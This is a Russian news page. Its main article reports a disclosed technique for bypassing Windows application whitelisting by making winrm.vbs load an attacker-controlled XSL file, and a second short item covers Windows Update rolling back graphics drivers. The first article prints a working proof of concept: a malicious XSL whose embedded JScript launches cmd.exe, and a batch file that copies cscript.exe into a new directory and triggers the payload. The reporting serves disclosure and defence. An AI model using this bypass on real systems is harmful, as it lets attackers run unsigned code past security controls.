В Windows найден метод обхода белых списков приложений

Олег Иванов 16 Июля 2018 - 08:51

...

В Windows найден метод обхода белых списков приложений

Исследователь в области кибербезопасности Мэтт Гребер нашел интересный метод обхода белых списков приложений в Windows. Помимо этого, эксперт описал технику выполнения произвольного неподписанного кода в winrm.vbs.

winrm.vbs (подписанный Windows скрипт в System32) способен выполнять контролируемый злоумышленником XSL, который не попадет под ограничения «enlightened script host», в результате это приведет к выполнению произвольного неподписанного кода.

«Если вы добавляете “-format:pretty” или “ -format:text” в winrm.vbs, он вытащит WsmPty.xsl или WsmTxt.xsl из каталога, в котором находится cscript.exe. Это значит, что атакующий может скопировать cscript.exe в нужное ему место, где находится вредоносный XSL», — пишет специалист.

«Благодаря этому киберпреступник может добиться выполнения произвольного неподписанного кода. Эта техника практически идентична описанному Кейси Смитом методу с использованием wmic.exe».

Что касается Proof-of-Concept, эксперт опубликовал следующие шаги:

Поместить вредоносный файл WsmPty.xsl или WsmTxt.xsl в контролируемую атакующим директорию.
Скопировать файл cscript.exe или wscript.exe в ту же самую директорию.
Выполнить winrm.vbs с «-format», указав «pretty» (если был помещен файл WsmPty.xsl) или «text» (если был помещен файл WsmTxt.xsl).

Исследователь привел пример вредоносного XSL, который можно поместить в контролируемый злоумышленником каталог. В качестве примера эксперт помещает файл по этому пути — C:\BypassDir\WsmPty.xsl.

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
 <ms:script implements-prefix="user" language="JScript">
 <![CDATA[
 var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
 ]]> </ms:script>
</stylesheet>

Грамотное оформление вредоносного файла WsmPty.xsl должно включать использование встроенного пейлоада DotNetToJScript, приводящего к выполнению произвольного кода.

«В процессе помещения файла WsmPty.xsl можно использовать следующий пакетный файл для запуска пейлоада», — объясняет эксперт:

mkdir %SystemDrive%\BypassDir
copy %windir%\System32\cscript.exe %SystemDrive%\BypassDir
%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty

Следующая главная новость »

Гибридные облака 2026: зачем бизнесу смешивать инфраструктуры?
Регистрируйтесь на эфир!

Екатерина Быстрова 13 Мая 2026 - 20:09

Windows Ошибки конфигурации программ Домашние пользователи Корпорации Microsoft

Microsoft признала: Windows иногда откатывает видеодрайверы без спроса

Microsoft подтвердила, что Windows Update в некоторых случаях может заменять установленные пользователем драйверы видеокарт на более старые версии. Это касается ситуаций, когда владелец компьютера вручную скачал свежий драйвер с сайта Intel, AMD или Nvidia, но затем Windows Update установил поверх него другой драйвер из своего каталога.

Проблема не новая, но теперь Microsoft фактически признала её в документации. Пользователи давно жалуются, что Windows может откатить свежий графический драйвер на версию годичной или даже более старой давности.

В результате могут пропадать новые функции, ухудшаться производительность или переставать работать фирменные утилиты вроде AMD Adrenalin.

Причина в том, как Windows Update подбирает драйверы. Система ориентируется не только на номер версии или дату выпуска, а на внутренний механизм ранжирования и аппаратные идентификаторы. Если драйвер из каталога Windows Update считается лучшим совпадением для устройства, он может быть установлен даже тогда, когда на компьютере уже стоит более свежая версия.

Дополнительную роль играет слишком широкое таргетирование драйверов. Производители публикуют драйверы в каталоге Windows Update, Microsoft их утверждает, а затем система может распространить такой пакет сразу на широкий класс устройств. В итоге обновление попадает и на десктопы, где пользователь уже вручную поставил предпочитаемую версию драйвера.

Microsoft признаёт, что это приводит к нежелательным откатам у пользователей, которые сами управляют графическими драйверами. Особенно часто с этим сталкиваются владельцы ПК и ноутбуков, которые устанавливают драйверы напрямую от Intel, AMD или Nvidia.

Корпорация уже готовит изменение. Для новых устройств и новых графических драйверов Windows Update сможет использовать более точное таргетирование: не только аппаратные идентификаторы, но и CHID — идентификаторы конкретной модели компьютера или конфигурации. Это должно снизить риск того, что универсальный драйвер будет установлен не на то устройство или заменит более свежую версию.

Гибридные облака 2026: зачем бизнесу смешивать инфраструктуры?
Регистрируйтесь на эфир!